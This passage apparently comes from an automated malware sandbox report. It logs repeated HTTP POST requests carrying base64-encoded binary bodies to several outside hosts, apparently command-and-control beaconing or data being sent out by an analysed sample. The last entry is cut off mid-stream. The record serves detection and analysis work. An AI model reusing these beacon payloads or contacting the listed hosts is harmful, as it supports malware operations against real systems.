lYs19IFxSpvHZlsQYBwJ3lpxd/f/eFmpRaCI+2YK2tlvrZkjPNVpGXy1zQEDryvobr2ALrDBvPbyzE0xdhXOi6whxiR88zXf0MGI95HRf22ChnuMHbsnTYPUS2Kr3Mg54kkrFuJLii8N2oVIDkHOGi5ALq2t1yBR9HD9ax/Qi5GEu7d3vYQ5iWojALNPmHR5sHOyaa3bL1527oOC3ERtkU9jUFXXy97pvuJT9TE038WssveSRARgR38kO8rw5patpvP/FgwMLiiSmG90jbv2r8XrghtgxNQfVTD65f+7b16+oF4DWsayrWf+ZbHRD9ad/KEQznHLEgn9EyLmhK6nto+9mUAJEKBHXPr3R7Ekq67XZJOpAD4lmCtwDgtcDz6VLo7U5GNmUc93etmRinUwhziGa1W28odf3NGe2iSGa1Gr0nyS992xxUk5pQHd2kae1bJYLGlbLTTpvL4N5KKso4YCOxPHBUGb4vaqFI7R1l1bRLpqJ8Q/UGqWWc3qM42oBD4+VEZ+Czk1+Oncz67eJWE8hqMrLtE=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.com-sit.comCache-Control: no-cacheData Raw: 2f 53 58 6f 4e 6a 58 73 56 4a 76 70 62 6d 63 45 6e 42 41 4a 42 79 34 6d 32 38 58 44 36 35 45 68 4f 56 52 44 79 56 74 4e 47 50 6c 72 4e 6c 33 4b 68 51 39 69 31 56 44 56 46 65 6b 2f 37 6e 46 49 6e 75 44 42 35 54 30 52 71 55 34 53 67 51 74 79 30 42 76 6c 36 4c 38 36 74 32 64 71 53 6a 6f 56 65 32 37 70 39 69 6b 64 75 65 2b 34 2f 2f 45 34 4f 59 79 69 4c 33 48 70 43 58 37 35 4c 30 4e 4c 76 74 6f 63 52 45 79 4a 4c 30 57 72 39 58 6e 48 36 42 55 4f 47 5a 57 66 65 71 31 37 38 68 49 55 55 38 63 42 53 31 74 6e 77 41 44 78 45 51 46 6e 64 57 56 76 39 77 52 32 32 71 39 70 71 48 31 4a 75 76 68 70 31 38 42 6f 72 68 44 5a 39 6e 6f 42 71 37 36 4b 37 61 54 72 71 58 35 6e 48 58 6f 64 7a 5a 42 64 61 30 36 30 76 43 78 6b 59 2b 6e 38 52 74 6d 57 69 70 70 42 4a 47 62 35 35 52 67 35 5a 48 75 7a 52 6b 4f 59 57 6f 73 6c 65 4d 69 4f 70 6a 6e 4e 2f 63 36 4a 6c 78 51 62 64 77 4e 31 79 2b 6a 4e 70 74 76 6f 4c 4c 2f 34 72 32 52 43 31 61 31 54 2f 6b 61 4d 32 54 76 44 73 56 35 76 52 77 34 62 77 69 64 38 77 5a 69 48 73 52 44 37 36 6e 6e 31 63 43 4a 4d 73 52 37 66 34 48 68 58 49 70 6d 50 77 65 33 73 59 62 50 47 69 39 2f 45 4b 59 74 31 32 56 45 67 53 78 37 36 34 41 6c 4d 6e 7a 32 4b 35 2b 39 47 49 51 48 44 61 33 78 69 64 6a 46 44 6c 57 30 71 5a 4a 46 77 59 32 77 69 41 72 49 66 46 75 79 7a 30 47 2f 6c 51 31 49 4d 6b 42 5a 4c 75 50 71 53 39 31 46 55 68 62 32 7a 6c 41 34 46 37 68 4f 49 38 78 50 56 79 6d 2b 2f 34 71 72 65 52 6c 6c 39 77 33 45 42 67 6a 69 66 57 4b 6e 47 61 30 62 78 31 6b 4b 7a 46 64 4e 71 6c 52 76 7a 42 30 6a 30 38 36 57 77 41 6e 64 72 50 53 4e 76 76 64 36 61 55 75 72 4b 32 54 57 57 49 33 5a 6e 57 35 6b 3d Data Ascii: /SXoNjXsVJvpbmcEnBAJBy4m28XD65EhOVRDyVtNGPlrNl3KhQ9i1VDVFek/7nFInuDB5T0RqU4SgQty0Bvl6L86t2dqSjoVe27p9ikdue+4//E4OYyiL3HpCX75L0NLvtocREyJL0Wr9XnH6BUOGZWfeq178hIUU8cBS1tnwADxEQFndWVv9wR22q9pqH1Juvhp18BorhDZ9noBq76K7aTrqX5nHXodzZBda060vCxkY+n8RtmWippBJGb55Rg5ZHuzRkOYWosleMiOpjnN/c6JlxQbdwN1y+jNptvoLL/4r2RC1a1T/kaM2TvDsV5vRw4bwid8wZiHsRD76nn1cCJMsR7f4HhXIpmPwe3sYbPGi9/EKYt12VEgSx764AlMnz2K5+9GIQHDa3xidjFDlW0qZJFwY2wiArIfFuyz0G/lQ1IMkBZLuPqS91FUhb2zlA4F7hOI8xPVym+/4qreRll9w3EBgjifWKnGa0bx1kKzFdNqlRvzB0j086WwAndrPSNvvd6aUurK2TWWI3ZnW5k=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 73 76 4b 61 72 48 4e 75 55 4a 73 39 6d 47 56 54 75 6d 48 42 39 42 78 6c 51 6a 58 5a 31 62 68 33 56 77 4f 4d 64 75 62 70 65 30 47 42 36 72 31 6e 46 41 47 6f 46 33 5a 37 6c 35 41 39 41 58 72 6c 35 51 59 76 71 52 30 36 73 64 6e 51 44 41 48 7a 32 2b 5a 53 43 47 73 31 76 79 4f 71 4c 4b 43 2b 63 67 70 41 70 2b 6d 44 53 6c 68 35 58 38 35 75 51 51 65 61 38 47 2b 41 79 49 55 75 79 4a 58 41 4a 74 31 4a 7a 68 65 44 70 52 4b 41 37 43 35 35 30 77 34 74 56 48 4e 41 57 67 44 58 70 4c 6b 64 4a 52 2b 47 37 61 49 58 48 75 4b 59 31 5a 75 6f 49 62 4d 43 2b 43 54 68 36 64 4e 54 7a 55 53 30 4c 2b 31 38 79 46 77 78 41 46 4c 4a 4b 50 56 4e 45 55 6d 75 77 6d 63 6e 69 4f 79 30 37 58 61 47 49 73 6b 61 6e 55 31 72 2f 32 7a 39 65 6d 4e 30 39 47 43 4e 38 5a 4e 49 2f 79 49 53 39 50 66 35 69 53 43 48 7a 51 2f 55 71 32 4f 57 4c 49 52 35 43 6b 32 63 69 58 61 4e 51 73 57 62 76 66 56 76 4f 64 44 4d 38 49 6e 2f 56 30 55 43 70 37 66 47 38 4b 66 4d 70 4c 46 74 48 53 49 50 48 59 64 64 4a 55 4b 38 76 58 76 62 6d 65 43 4a 69 6f 68 65 79 58 56 4e 44 34 71 4b 61 6f 4f 5a 51 2b 31 78 34 4b 53 58 74 6a 68 57 6f 55 4e 41 53 4c 38 6d 39 61 45 59 70 2b 42 46 63 70 4f 5a 54 65 68 36 7a 45 75 58 78 78 44 51 32 50 37 59 61 30 43 6d 61 4e 73 2f 59 52 76 34 6e 69 69 64 7a 69 56 71 6c 69 77 30 4a 35 49 48 2b 51 33 44 36 49 47 49 51 4c 56 72 7a 6e 73 47 2b 68 62 30 44 47 38 46 64 4b 31 39 64 68 43 33 30 38 46 75 7a 6d 38 6f 65 7a 6c 71 38 54 6e 45 6b 32 6a 44 31 64 6e 72 43 34 31 79 33 37 45 66 42 73 47 56 4b 77 47 64 69 79 4d 42 73 6d 4c 31 68 51 46 68 56 55 56 70 63 42 4f 4d 72 38 2f 58 52 44 2b 2b 55 46 4d 41 4e 69 33 38 76 7a 36 57 30 78 32 35 4e 58 69 2b 33 41 57 6e 32 58 76 39 4c 79 74 68 Data Ascii: svKarHNuUJs9mGVTumHB9BxlQjXZ1bh3VwOMdubpe0GB6r1nFAGoF3Z7l5A9AXrl5QYvqR06sdnQDAHz2+ZSCGs1vyOqLKC+cgpAp+mDSlh5X85uQQea8G+AyIUuyJXAJt1JzheDpRKA7C550w4tVHNAWgDXpLkdJR+G7aIXHuKY1ZuoIbMC+CTh6dNTzUS0L+18yFwxAFLJKPVNEUmuwmcniOy07XaGIskanU1r/2z9emN09GCN8ZNI/yIS9Pf5iSCHzQ/Uq2OWLIR5Ck2ciXaNQsWbvfVvOdDM8In/V0UCp7fG8KfMpLFtHSIPHYddJUK8vXvbmeCJioheyXVND4qKaoOZQ+1x4KSXtjhWoUNASL8m9aEYp+BFcpOZTeh6zEuXxxDQ2P7Ya0CmaNs/YRv4niidziVqliw0J5IH+Q3D6IGIQLVrznsG+hb0DG8FdK19dhC308Fuzm8oezlq8TnEk2jD1dnrC41y37EfBsGVKwGdiyMBsmL1hQFhVUVpcBOMr8/XRD++UFMANi38vz6W0x25NXi+3AWn2Xv9Lyth
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 73 76 4b 61 72 48 4e 75 55 4a 73 39 6d 47 56 54 75 6d 48 42 39 42 78 6c 51 6a 58 5a 31 62 68 33 56 77 4f 4d 64 75 62 70 65 30 47 42 36 72 31 6e 46 41 47 6f 46 33 5a 37 6c 35 41 39 41 58 72 6c 35 51 59 76 71 52 30 36 73 64 6e 51 44 41 48 7a 32 2b 5a 53 43 47 73 31 76 79 4f 71 4c 4b 43 2b 63 67 70 41 70 2b 6d 44 53 6c 68 35 58 38 35 75 51 51 65 61 38 47 2b 41 79 49 55 75 79 4a 58 41 4a 74 31 4a 7a 68 65 44 70 52 4b 41 37 43 35 35 30 77 34 74 56 48 4e 41 57 67 44 58 70 4c 6b 64 4a 52 2b 47 37 61 49 58 48 75 4b 59 31 5a 75 6f 49 62 4d 43 2b 43 54 68 36 64 4e 54 7a 55 53 30 4c 2b 31 38 79 46 77 78 41 46 4c 4a 4b 50 56 4e 45 55 6d 75 77 6d 63 6e 69 4f 79 30 37 58 61 47 49 73 6b 61 6e 55 31 72 2f 32 7a 39 65 6d 4e 30 39 47 43 4e 38 5a 4e 49 2f 79 49 53 39 50 66 35 69 53 43 48 7a 51 2f 55 71 32 4f 57 4c 49 52 35 43 6b 32 63 69 58 61 4e 51 73 57 62 76 66 56 76 4f 64 44 4d 38 49 6e 2f 56 30 55 43 70 37 66 47 38 4b 66 4d 70 4c 46 74 48 53 49 50 48 59 64 64 4a 55 4b 38 76 58 76 62 6d 65 43 4a 69 6f 68 65 79 58 56 4e 44 34 71 4b 61 6f 4f 5a 51 2b 31 78 34 4b 53 58 74 6a 68 57 6f 55 4e 41 53 4c 38 6d 39 61 45 59 70 2b 42 46 63 70 4f 5a 54 65 68 36 7a 45 75 58 78 78 44 51 32 50 37 59 61 30 43 6d 61 4e 73 2f 59 52 76 34 6e 69 69 64 7a 69 56 71 6c 69 77 30 4a 35 49 48 2b 51 33 44 36 49 47 49 51 4c 56 72 7a 6e 73 47 2b 68 62 30 44 47 38 46 64 4b 31 39 64 68 43 33 30 38 46 75 7a 6d 38 6f 65 7a 6c 71 38 54 6e 45 6b 32 6a 44 31 64 6e 72 43 34 31 79 33 37 45 66 42 73 47 56 4b 77 47 64 69 79 4d 42 73 6d 4c 31 68 51 46 68 56 55 56 70 63 42 4f 4d 72 38 2f 58 52 44 2b 2b 55 46 4d 41 4e 69 33 38 76 7a 36 57 30 78 32 35 4e 58 69 2b 33 41 57 6e 32 58 76 39 4c 79 74 68 Data Ascii: svKarHNuUJs9mGVTumHB9BxlQjXZ1bh3VwOMdubpe0GB6r1nFAGoF3Z7l5A9AXrl5QYvqR06sdnQDAHz2+ZSCGs1vyOqLKC+cgpAp+mDSlh5X85uQQea8G+AyIUuyJXAJt1JzheDpRKA7C550w4tVHNAWgDXpLkdJR+G7aIXHuKY1ZuoIbMC+CTh6dNTzUS0L+18yFwxAFLJKPVNEUmuwmcniOy07XaGIskanU1r/2z9emN09GCN8ZNI/yIS9Pf5iSCHzQ/Uq2OWLIR5Ck2ciXaNQsWbvfVvOdDM8In/V0UCp7fG8KfMpLFtHSIPHYddJUK8vXvbmeCJioheyXVND4qKaoOZQ+1x4KSXtjhWoUNASL8m9aEYp+BFcpOZTeh6zEuXxxDQ2P7Ya0CmaNs/YRv4niidziVqliw0J5IH+Q3D6IGIQLVrznsG+hb0DG8FdK19dhC308Fuzm8oezlq8TnEk2jD1dnrC41y37EfBsGVKwGdiyMBsmL1hQFhVUVpcBOMr8/XRD++UFMANi38vz6W0x25NXi+3AWn2Xv9Lyth
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 31 46 30 64 58 58 67 62 33 57 4b 6a 39 45 37 71 2b 79 68 54 43 57 74 70 5a 73 76 41 79 38 6a 63 4c 49 36 33 59 55 72 31 64 34 41 58 76 78 58 7a 47 5a 54 66 4c 6d 45 49 70 35 59 4c 56 61 36 56 4e 2b 4c 33 4c 65 49 2f 44 58 69 76 4f 68 4e 39 41 57 39 56 38 47 37 55 4d 41 55 69 63 69 53 56 31 74 48 52 52 72 32 69 52 73 61 51 65 62 38 73 32 61 41 44 64 44 56 63 73 31 57 58 4f 51 4d 55 4f 2f 63 36 68 6c 61 69 61 68 67 46 48 65 6a 53 55 54 6f 2b 35 57 48 39 49 59 4b 66 79 59 6a 51 39 63 58 77 64 72 69 6d 6d 31 42 68 62 67 63 4a 78 56 30 79 74 6b 63 68 79 56 68 43 42 52 58 79 42 37 4f 68 6a 45 46 31 5a 67 5a 42 6c 41 35 6c 36 76 56 57 4b 73 7a 76 56 42 42 55 35 46 5a 6d 4b 6f 2f 4f 51 74 70 4f 2f 48 76 69 6e 6c 54 30 6f 2b 69 58 78 35 6c 53 37 76 74 4c 79 4d 62 4d 34 63 30 45 6a 33 2f 6d 2b 45 73 59 43 67 34 79 4a 68 34 68 48 67 48 7a 36 49 73 73 63 58 7a 4c 63 55 63 63 37 4f 62 75 55 75 77 46 30 37 61 79 36 6e 61 46 37 67 53 52 54 4f 41 79 30 49 57 4f 6f 2b 64 42 72 37 59 37 30 46 41 66 6f 44 69 51 6f 33 73 71 31 67 78 58 6a 57 61 4c 5a 48 45 66 43 61 42 79 62 6d 49 63 41 35 4c 67 6c 69 43 50 61 74 41 49 70 35 43 2f 64 65 34 44 78 39 5a 6d 78 44 47 45 53 47 4d 75 46 31 41 69 50 66 31 45 50 73 55 48 54 44 65 56 31 73 59 46 6c 37 45 54 71 2f 42 6d 39 77 56 73 39 72 78 6b 4c 6a 59 78 65 4a 38 54 74 59 6f 7a 46 43 32 50 74 63 7a 71 51 55 47 42 4b 37 47 61 31 32 32 59 52 71 78 71 34 35 39 76 56 61 54 54 58 7a 6e 77 4c 7a 62 39 4d 44 39 76 4b 67 6d 52 78 54 34 63 49 4f 6c 75 41 73 57 56 4f 76 32 5a 71 4b 64 50 4a 76 4f 78 46 58 78 39 52 61 7a 72 71 57 6d 64 33 51 36 53 71 75 56 66 61 2f 43 6b 75 41 74 4d 59 39 41 63 55 74 42 34 72 47 59 46 6e 4d 77 61 69 4f 63 3d Data Ascii: 1F0dXXgb3WKj9E7q+yhTCWtpZsvAy8jcLI63YUr1d4AXvxXzGZTfLmEIp5YLVa6VN+L3LeI/DXivOhN9AW9V8G7UMAUiciSV1tHRRr2iRsaQeb8s2aADdDVcs1WXOQMUO/c6hlaiahgFHejSUTo+5WH9IYKfyYjQ9cXwdrimm1BhbgcJxV0ytkchyVhCBRXyB7OhjEF1ZgZBlA5l6vVWKszvVBBU5FZmKo/OQtpO/HvinlT0o+iXx5lS7vtLyMbM4c0Ej3/m+EsYCg4yJh4hHgHz6IsscXzLcUcc7ObuUuwF07ay6naF7gSRTOAy0IWOo+dBr7Y70FAfoDiQo3sq1gxXjWaLZHEfCaBybmIcA5LgliCPatAIp5C/de4Dx9ZmxDGESGMuF1AiPf1EPsUHTDeV1sYFl7ETq/Bm9wVs9rxkLjYxeJ8TtYozFC2PtczqQUGBK7Ga122YRqxq459vVaTTXznwLzb9MD9vKgmRxT4cIOluAsWVOv2ZqKdPJvOxFXx9RazrqWmd3Q6SquVfa/CkuAtMY9AcUtB4rGYFnMwaiOc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 45 72 37 65 6e 33 64 47 33 32 4a 39 6f 6d 64 45 35 76 46 33 47 63 42 7a 45 4f 55 74 79 48 43 48 6d 7a 6c 45 6f 64 64 73 6f 2f 58 54 67 30 51 69 30 35 47 75 75 53 48 61 41 4a 4f 66 46 42 49 79 31 48 38 6c 51 38 52 54 42 39 4e 61 53 35 4c 63 34 56 62 73 52 4a 6f 73 4c 56 58 59 52 30 2f 2f 77 32 38 4a 71 47 42 37 64 4c 38 33 5a 39 76 43 4b 4b 72 65 74 5a 46 6e 35 4d 70 6e 36 50 33 45 63 76 4a 34 70 54 6d 59 6a 52 6f 4d 66 6d 2f 61 6e 42 64 72 56 52 6a 6b 4c 4e 4d 6e 33 38 76 75 58 41 34 74 6b 36 78 5a 44 64 57 6e 51 53 5a 53 4f 30 39 63 54 68 58 77 6e 62 61 58 44 47 4c 4f 6d 52 69 4a 2b 63 79 63 39 74 76 64 32 62 34 2f 66 62 58 6e 61 75 36 4a 47 44 37 33 58 74 57 6e 71 63 61 6c 73 46 32 41 48 5a 59 6e 41 49 44 45 4d 52 48 58 66 6f 67 72 4d 79 43 37 36 71 45 72 41 76 65 75 68 32 71 78 5a 67 75 61 4a 6e 4f 4e 79 30 41 43 35 58 6c 4b 55 38 37 30 54 65 70 58 74 6c 4e 33 74 62 4f 35 42 73 4c 34 41 42 39 69 6e 65 56 45 63 75 50 6f 55 31 48 75 6b 5a 69 46 30 39 50 6a 56 37 30 58 4e 4b 75 2f 57 64 44 7a 75 67 42 47 53 79 30 34 36 30 4a 51 56 76 2f 55 78 39 78 46 67 4d 63 69 4f 79 78 43 41 43 75 6f 73 48 5a 74 4a 2b 43 36 6e 4e 6e 43 46 6b 6f 33 31 45 62 4c 71 66 53 77 67 70 75 54 63 6c 72 47 54 52 33 33 35 35 70 47 76 70 32 2f 52 53 6f 5a 72 46 59 77 66 47 65 57 79 76 59 37 64 47 6f 61 4d 6e 45 54 6d 77 66 66 37 77 2b 74 4e 65 69 36 6a 2b 54 66 42 6f 33 6a 34 78 33 56 32 30 35 69 79 7a 4e 55 63 5a 67 35 6f 71 44 48 2b 75 71 46 66 43 4f 63 38 46 56 33 36 39 43 53 4d 5a 64 6d 76 42 6d 51 48 57 73 4a 52 55 69 55 2b 49 76 49 57 70 59 66 32 75 77 67 73 75 66 39 74 65 44 33 7a 37 77 30 78 49 31 47 62 57 52 71 75 59 48 6e 59 76 6d 76 2b 43 62 6f 42 68 2b 6d 78 41 48 46 62 77 6f 42 4c 57 4c 54 4e 68 79 2b 79 57 44 34 77 6e 4e 4d 33 73 74 4e 62 41 3d 3d Data Ascii: Er7en3dG32J9omdE5vF3GcBzEOUtyHCHmzlEoddso/XTg0Qi05GuuSHaAJOfFBIy1H8lQ8RTB9NaS5Lc4VbsRJosLVXYR0//w28JqGB7dL83Z9vCKKretZFn5Mpn6P3EcvJ4pTmYjRoMfm/anBdrVRjkLNMn38vuXA4tk6xZDdWnQSZSO09cThXwnbaXDGLOmRiJ+cyc9tvd2b4/fbXnau6JGD73XtWnqcalsF2AHZYnAIDEMRHXfogrMyC76qErAveuh2qxZguaJnONy0AC5XlKU870TepXtlN3tbO5BsL4AB9ineVEcuPoU1HukZiF09PjV70XNKu/WdDzugBGSy0460JQVv/Ux9xFgMciOyxCACuosHZtJ+C6nNnCFko31EbLqfSwgpuTclrGTR3355pGvp2/RSoZrFYwfGeWyvY7dGoaMnETmwff7w+tNei6j+TfBo3j4x3V205iyzNUcZg5oqDH+uqFfCOc8FV369CSMZdmvBmQHWsJRUiU+IvIWpYf2uwgsuf9teD3z7w0xI1GbWRquYHnYvmv+CboBh+mxAHFbwoBLWLTNhy+yWD4wnNM3stNbA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 31 46 30 64 58 58 67 62 33 57 4b 6a 39 45 37 71 2b 79 68 54 43 57 74 70 5a 73 76 41 79 38 6a 63 4c 49 36 33 59 55 72 31 64 34 41 58 76 78 58 7a 47 5a 54 66 4c 6d 45 49 70 35 59 4c 56 61 36 56 4e 2b 4c 33 4c 65 49 2f 44 58 69 76 4f 68 4e 39 41 57 39 56 38 47 37 55 4d 41 55 69 63 69 53 56 31 74 48 52 52 72 32 69 52 73 61 51 65 62 38 73 32 61 41 44 64 44 56 63 73 31 57 58 4f 51 4d 55 4f 2f 63 36 68 6c 61 69 61 68 67 46 48 65 6a 53 55 54 6f 2b 35 57 48 39 49 59 4b 66 79 59 6a 51 39 63 58 77 64 72 69 6d 6d 31 42 68 62 67 63 4a 78 56 30 79 74 6b 63 68 79 56 68 43 42 52 58 79 42 37 4f 68 6a 45 46 31 5a 67 5a 42 6c 41 35 6c 36 76 56 57 4b 73 7a 76 56 42 42 55 35 46 5a 6d 4b 6f 2f 4f 51 74 70 4f 2f 48 76 69 6e 6c 54 30 6f 2b 69 58 78 35 6c 53 37 76 74 4c 79 4d 62 4d 34 63 30 45 6a 33 2f 6d 2b 45 73 59 43 67 34 79 4a 68 34 68 48 67 48 7a 36 49 73 73 63 58 7a 4c 63 55 63 63 37 4f 62 75 55 75 77 46 30 37 61 79 36 6e 61 46 37 67 53 52 54 4f 41 79 30 49 57 4f 6f 2b 64 42 72 37 59 37 30 46 41 66 6f 44 69 51 6f 33 73 71 31 67 78 58 6a 57 61 4c 5a 48 45 66 43 61 42 79 62 6d 49 63 41 35 4c 67 6c 69 43 50 61 74 41 49 70 35 43 2f 64 65 34 44 78 39 5a 6d 78 44 47 45 53 47 4d 75 46 31 41 69 50 66 31 45 50 73 55 48 54 44 65 56 31 73 59 46 6c 37 45 54 71 2f 42 6d 39 77 56 73 39 72 78 6b 4c 6a 59 78 65 4a 38 54 74 59 6f 7a 46 43 32 50 74 63 7a 71 51 55 47 42 4b 37 47 61 31 32 32 59 52 71 78 71 34 35 39 76 56 61 54 54 58 7a 6e 77 4c 7a 62 39 4d 44 39 76 4b 67 6d 52 78 54 34 63 49 4f 6c 75 41 73 57 56 4f 76 32 5a 71 4b 64 50 4a 76 4f 78 46 58 78 39 52 61 7a 72 71 57 6d 64 33 51 36 53 71 75 56 66 61 2f 43 6b 75 41 74 4d 59 39 41 63 55 74 42 34 72 47 59 46 6e 4d 77 61 69 4f 63 3d Data Ascii: 1F0dXXgb3WKj9E7q+yhTCWtpZsvAy8jcLI63YUr1d4AXvxXzGZTfLmEIp5YLVa6VN+L3LeI/DXivOhN9AW9V8G7UMAUiciSV1tHRRr2iRsaQeb8s2aADdDVcs1WXOQMUO/c6hlaiahgFHejSUTo+5WH9IYKfyYjQ9cXwdrimm1BhbgcJxV0ytkchyVhCBRXyB7OhjEF1ZgZBlA5l6vVWKszvVBBU5FZmKo/OQtpO/HvinlT0o+iXx5lS7vtLyMbM4c0Ej3/m+EsYCg4yJh4hHgHz6IsscXzLcUcc7ObuUuwF07ay6naF7gSRTOAy0IWOo+dBr7Y70FAfoDiQo3sq1gxXjWaLZHEfCaBybmIcA5LgliCPatAIp5C/de4Dx9ZmxDGESGMuF1AiPf1EPsUHTDeV1sYFl7ETq/Bm9wVs9rxkLjYxeJ8TtYozFC2PtczqQUGBK7Ga122YRqxq459vVaTTXznwLzb9MD9vKgmRxT4cIOluAsWVOv2ZqKdPJvOxFXx9RazrqWmd3Q6SquVfa/CkuAtMY9AcUtB4rGYFnMwaiOc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 54 52 30 6f 31 73 51 4a 34 57 4a 69 70 6f 46 62 33 34 72 6b 33 35 63 4a 51 69 7a 38 4a 51 33 75 4f 42 50 6a 50 63 76 68 72 6f 76 79 72 66 30 51 35 70 4b 4e 6b 79 51 4a 64 76 34 2b 2f 33 76 67 36 79 65 4e 67 36 49 36 42 4e 4d 51 61 6d 44 39 52 64 78 6d 50 4a 41 61 78 57 59 57 77 47 4b 59 6f 55 53 75 55 4d 32 48 59 45 71 62 33 37 61 43 66 77 47 4c 6e 59 54 54 58 35 78 38 69 31 6a 58 32 31 4a 7a 46 4e 74 4d 77 33 79 38 4d 50 6c 48 79 34 57 47 50 42 65 77 77 70 43 45 50 4e 56 30 52 57 2b 54 78 37 43 78 76 71 65 58 6f 55 36 49 6b 66 35 31 62 33 6a 2f 2f 36 62 2b 64 4e 71 52 64 62 50 69 5a 39 6d 43 2f 73 4b 58 6c 64 56 63 63 2b 76 64 41 30 67 46 73 47 73 34 30 39 68 4a 7a 76 76 35 61 66 4b 6d 4b 34 35 51 43 6b 33 76 77 74 4e 48 51 59 68 6c 73 35 54 69 2f 51 54 69 76 30 2b 61 59 4a 64 6a 4d 39 47 67 37 44 6b 32 73 4e 53 32 58 6f 35 67 44 33 6f 34 61 79 37 75 63 30 49 30 65 68 42 39 78 53 71 61 46 6a 49 58 76 44 4d 68 48 4f 4b 54 2f 65 37 65 65 61 32 76 63 41 6f 78 45 35 4d 49 61 69 5a 52 41 35 78 69 6b 5a 77 43 39 35 4d 77 35 67 4d 30 4e 58 2b 51 4f 39 32 4e 74 31 55 33 7a 2f 36 6d 65 30 73 57 4b 46 64 45 2f 67 64 78 79 6e 4d 53 5a 4d 4c 76 38 45 6c 72 71 38 78 70 52 32 4d 49 6f 36 52 34 2f 78 6d 75 31 48 30 72 4a 46 73 31 49 75 59 57 79 72 2f 30 51 53 50 56 47 34 35 42 52 4a 37 49 38 31 2b 34 51 6a 70 4a 30 33 66 44 71 56 74 4f 6c 77 42 39 41 31 65 49 7a 32 56 72 2f 63 4b 63 5a 39 45 41 4f 46 78 65 76 49 6c 68 53 61 64 4a 35 65 6c 44 51 79 35 55 34 63 67 79 61 62 76 7a 4f 69 79 78 4b 4d 39 4d 76 78 69 48 65 70 58 67 46 46 37 49 6d 59 68 7a 68 70 6e 52 73 59 78 44 78 4d 64 7a 41 38 61 49 36 70 73 71 31 71 46 47 70 33 4d 53 70 6c 51 48 54 4a 75 68 43 55 49 70 58 70 63 30 4c 50 34 3d Data Ascii: TR0o1sQJ4WJipoFb34rk35cJQiz8JQ3uOBPjPcvhrovyrf0Q5pKNkyQJdv4+/3vg6yeNg6I6BNMQamD9RdxmPJAaxWYWwGKYoUSuUM2HYEqb37aCfwGLnYTTX5x8i1jX21JzFNtMw3y8MPlHy4WGPBewwpCEPNV0RW+Tx7CxvqeXoU6Ikf51b3j//6b+dNqRdbPiZ9mC/sKXldVcc+vdA0gFsGs409hJzvv5afKmK45QCk3vwtNHQYhls5Ti/QTiv0+aYJdjM9Gg7Dk2sNS2Xo5gD3o4ay7uc0I0ehB9xSqaFjIXvDMhHOKT/e7eea2vcAoxE5MIaiZRA5xikZwC95Mw5gM0NX+QO92Nt1U3z/6me0sWKFdE/gdxynMSZMLv8Elrq8xpR2MIo6R4/xmu1H0rJFs1IuYWyr/0QSPVG45BRJ7I81+4QjpJ03fDqVtOlwB9A1eIz2Vr/cKcZ9EAOFxevIlhSadJ5elDQy5U4cgyabvzOiyxKM9MvxiHepXgFF7ImYhzhpnRsYxDxMdzA8aI6psq1qFGp3MSplQHTJuhCUIpXpc0LP4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 34 49 55 72 79 68 32 6d 34 47 4a 71 39 42 6a 77 56 50 44 62 2f 46 59 38 71 44 72 4c 72 30 39 57 6f 54 44 51 36 71 58 52 6a 5a 73 44 69 31 43 77 72 75 51 65 38 6e 50 56 49 41 59 45 54 55 77 38 32 45 38 64 64 6a 31 79 67 44 76 4a 6d 59 79 6d 4d 6f 54 76 49 47 67 35 72 32 31 61 77 42 35 46 58 57 51 65 66 2b 45 62 6c 6c 58 30 41 6a 47 51 65 33 56 48 54 79 30 34 54 6f 48 6c 6e 5a 6c 67 2b 6e 43 72 57 77 58 62 39 30 36 6d 7a 34 6a 76 77 71 49 4d 59 7a 33 6f 71 37 48 33 2b 57 6f 62 6b 31 43 2b 67 4f 61 49 50 76 31 76 59 4f 37 6b 53 6d 56 49 79 51 33 2f 41 6e 76 67 35 45 78 47 35 77 4d 39 6d 68 77 35 54 41 4f 65 53 57 56 67 75 46 49 50 73 6f 63 76 2b 47 52 52 75 49 74 5a 52 68 75 78 58 37 62 57 30 75 64 77 53 4e 50 74 66 34 30 49 44 6f 50 45 45 71 67 4c 45 70 49 5a 6f 48 35 41 74 2f 50 66 79 52 61 64 32 72 2b 39 35 63 32 43 72 38 66 67 39 61 44 39 42 75 70 74 55 2b 69 4e 42 45 6b 6c 31 62 55 48 6b 36 67 50 7a 45 4e 42 63 78 74 45 66 7a 72 55 66 79 54 33 61 71 76 4b 52 64 48 7a 49 38 36 42 67 72 72 77 64 43 46 43 42 67 65 49 71 61 64 4c 4f 7a 46 45 66 66 45 72 7a 73 6c 41 39 56 57 52 38 39 32 77 36 30 53 39 66 53 